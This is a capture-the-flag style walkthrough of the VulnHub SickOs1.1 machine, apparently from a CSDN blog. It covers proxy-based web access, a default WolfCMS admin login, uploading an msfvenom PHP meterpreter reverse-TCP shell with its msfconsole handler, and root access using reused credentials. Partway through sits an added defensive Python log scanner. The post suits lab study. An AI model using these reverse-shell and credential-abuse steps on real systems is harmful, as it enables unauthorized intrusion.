VulnHub target machine: SickOs1.1


Download address: https://www.vulnhub.com/entry/sickos-11,132/
After downloading the target machine, open it in VMware Workstation and configure the network adapter in bridged mode.
Task: elevate privileges and obtain the flag
Attack machine: Kali Linux 192.168.8.195
Target machine: 192.168.8.194


1. Information collection

Use nmap to discover live hosts and find the target machine.
Command: nmap -sP 192.168.8.0/24

Scan the target's open ports with nmap. Ports 22, 3128 and 8080 are open, and the output indicates that access has to go through a proxy on port 3128.
Command: nmap -A -p- 192.168.8.194

Set the proxy to 192.168.8.194:3128.

Access 192.168.8.194 and view the page source; no useful information was found.

Try to access robots.txt, which gives /wolfcms. Visit http://192.168.8.194/wolfcms. wolfcms is a lightweight CMS program written in PHP. The admin login page is http://192.168.8.194/wolfcms/?/admin/login

The default user name and password of wolfcms are admin and admin respectively. Try to log in; the login succeeds, and a file upload location can be found on the page.

2. Getshell

Here, file upload is used to get a shell: generate the payload with msfvenom, start a listener in msfconsole, upload the file, then execute it to get the shell.

Start the listener in msfconsole, where lhost is set to the attacker's IP and lport can be any listening port.
Command:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.8.195
set lport 4444
run

Generate the payload with msfvenom and copy it into a PHP file, here slow.php.
Command: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.8.195 lport=4444 -f raw
-p: select a payload
-f: output format; raw is selected here, a native format containing only the data

After uploading slow.php, visit public and execute slow.php. The shell is obtained successfully.
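A defender-side check for the step above, as an added example that is not part of the original post: it scans web access log lines for PHP files served successfully from the wolfcms upload directory and records whether the same client posted to the admin login first. The Apache combined log format, the /wolfcms/public/ upload path, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re

# Assumptions (not from the original post): Apache combined log format, and
# uploads stored under /wolfcms/public/ as the walkthrough's "visit public" implies.
UPLOAD_PREFIX = "/wolfcms/public/"
LOGIN_PATH = "/wolfcms/?/admin/login"
# Extensions commonly mapped to the PHP handler; adjust to the server's config.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (dates, sizes and status codes are made up).
SAMPLE_LOG = """\
192.168.8.195 - - [21/Feb/2021:10:01:02 +0800] "GET /robots.txt HTTP/1.1" 200 45 "-" "Mozilla/5.0"
192.168.8.195 - - [21/Feb/2021:10:02:10 +0800] "POST /wolfcms/?/admin/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.8.195 - - [21/Feb/2021:10:05:31 +0800] "GET /wolfcms/public/slow.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.8.50 - - [21/Feb/2021:10:06:00 +0800] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.8.50 - - [21/Feb/2021:10:07:00 +0800] "GET /wolfcms/public/missing.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""


def find_upload_execution(log_text):
    """Return alerts for successful script requests inside the upload directory."""
    logged_in = set()  # clients that earlier posted to the admin login page
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, url, status = m["ip"], m["url"], int(m["status"])
        if m["method"] == "POST" and url.startswith(LOGIN_PATH):
            logged_in.add(ip)
            continue
        path = url.split("?", 1)[0]  # ignore any query string
        if path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(path) and status < 400:
            alerts.append({
                "time": m["ts"], "client": ip, "path": path,
                "after_admin_login": ip in logged_in,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_execution(SAMPLE_LOG):
        print(alert)
```

Because this site is reached through the proxy on port 3128, the web server's log may show the proxy's address as the client; in that case correlate with the proxy's own access log.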

3. Privilege escalation

Use Python to enter a pseudo-terminal.

Check the wolfcms configuration file config.php, which contains a user name and password. Use them to try to log in as root, but the login fails. Check /etc/passwd and find the user sickos. The default ID of the first user added on Linux is 1000, and sickos is that first user.

Try to log in as sickos; the login succeeds.

Log in to root from the sickos user. After successfully logging in, find the flag in the /root directory. This completes the target machine.

Origin blog.csdn.net/Slow_/article/details/113945004